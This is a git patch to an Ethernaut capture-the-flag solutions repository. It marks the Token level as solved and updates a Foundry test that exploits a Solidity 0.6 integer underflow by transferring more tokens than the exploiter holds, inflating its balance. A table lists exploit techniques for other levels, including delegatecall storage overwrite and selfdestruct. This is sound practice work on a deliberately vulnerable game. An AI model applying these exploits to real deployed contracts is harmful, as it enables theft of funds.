From 24e138c4f28b5c297ae66c4e4e275d676948e526 Mon Sep 17 00:00:00 2001 From: leovct Date: Tue, 24 Sep 2024 21:23:16 +0200 Subject: [PATCH] fix: Ethernaut lvl 5 --- doc/EthernautCTF.md | 2 +- package.json | 2 +- test/EthernautCTF/TokenExploit.t.sol | 13 ++++++++++--- 3 files changed, 12 insertions(+), 5 deletions(-) diff --git a/doc/EthernautCTF.md b/doc/EthernautCTF.md index e787908..1422dbc 100644 --- a/doc/EthernautCTF.md +++ b/doc/EthernautCTF.md @@ -6,7 +6,7 @@ | 02 | [Fallout](../src/EthernautCTF/Fallout.sol) | ✅ | [FalloutExploit](../test/EthernautCTF/FalloutExploit.t.sol) | Typo in the constructor name. | | 03 | [CoinFlip](../src/EthernautCTF/CoinFlip.sol) | ✅ | [CoinFlipExploit](../test/EthernautCTF/CoinFlipExploit.t.sol) | The contract relies on `block.number` to generate a random value. | | 04 | [Telephone](../src/EthernautCTF/Telephone.sol) | ✅ | [TelephoneExploit](../test/EthernautCTF/TelephoneExploit.t.sol) | Use a helper contract to make sure `tx.origin` and `msg.sender` are different. | -| 05 | [Token](../src/EthernautCTF/Token.sol) | ❌ | [TokenExploit](../test/EthernautCTF/TokenExploit.t.sol) | Exploit overflows and underflows of the `0.6.0` solidity compiler. | +| 05 | [Token](../src/EthernautCTF/Token.sol) | ✅ | [TokenExploit](../test/EthernautCTF/TokenExploit.t.sol) | Exploit overflows and underflows of the `0.6.0` solidity compiler. | | 06 | [Delegation](../src/EthernautCTF/Delegation.sol) | ❌ | [DelegationExploit](../test/EthernautCTF/DelegationExploit.t.sol) | Make use of the `delegatecall` to overwrite the storage of the main contract. | | 07 | [Force](../src/EthernautCTF/Force.sol) | ✅ | [ForceExploit](../test/EthernautCTF/ForceExploit.t.sol) | Create a contract, fund it with some ether and use the `selfdestruct` method to send the contract balance to any other contract (e.g. a contract without any implementation). | | 08 | [Vault](../src/EthernautCTF/Vault.sol) | ✅ | [VaultExploit](../test/EthernautCTF/VaultExploit.t.sol) | Read the password from the contract storage. | diff --git a/package.json b/package.json index ca74577..4311e9b 100644 --- a/package.json +++ b/package.json @@ -6,7 +6,7 @@ "check": "pnpm exec prettier --plugin prettier-plugin-solidity --check .", "lint": "pnpm exec prettier --plugin prettier-plugin-solidity --write .", "build": "forge build --sizes --skip Token", - "exploits": "forge test -vvv --summary --no-match-contract 'CollatzPuzzle|Delegation' --no-match-path test/EthernautCTF/TokenExploit.t.sol" + "exploits": "forge test -vvv --summary --no-match-contract 'CollatzPuzzle|Delegation'" }, "keywords": [], "author": "@leovct", diff --git a/test/EthernautCTF/TokenExploit.t.sol b/test/EthernautCTF/TokenExploit.t.sol index b08e3e3..13d58be 100644 --- a/test/EthernautCTF/TokenExploit.t.sol +++ b/test/EthernautCTF/TokenExploit.t.sol @@ -1,6 +1,13 @@ // SPDX-License-Identifier: GPL-3.0 pragma solidity ^0.6.0; +// Fix the following compiler error (specific to 0.6.x) +// Error: Unimplemented feature (/Users/distiller/project/libsolidity/codegen/CompilerUtils.cpp:420):Encoding type "struct StdInvariant.FuzzInterface memory[] memory" not yet implemented. +// UnimplementedFeatureError: Encoding type "struct StdInvariant.FuzzInterface memory[] memory" not yet implemented. +// - https://github.com/leovct/puzzl3s/issues/25 +// - https://github.com/foundry-rs/foundry/issues/4376 +pragma experimental ABIEncoderV2; + import '../../src/EthernautCTF/Token.sol'; import '@forge-std/Test.sol'; import '@forge-std/console2.sol'; @@ -21,15 +28,15 @@ contract TokenExploit is Test { } function testExploit() public { - uint256 balance = target.balanceOf(deployer); + uint256 balance = target.balanceOf(exploiter); console2.log('Balance: %d', balance); - assertEq(balance, 0); + assertEq(balance, 20); vm.startPrank(exploiter); assertTrue(target.transfer(address(0x0), 21)); vm.stopPrank(); - balance = target.balanceOf(deployer); + balance = target.balanceOf(exploiter); console2.log('Balance: %d', balance); assertTrue(balance >= 10000); }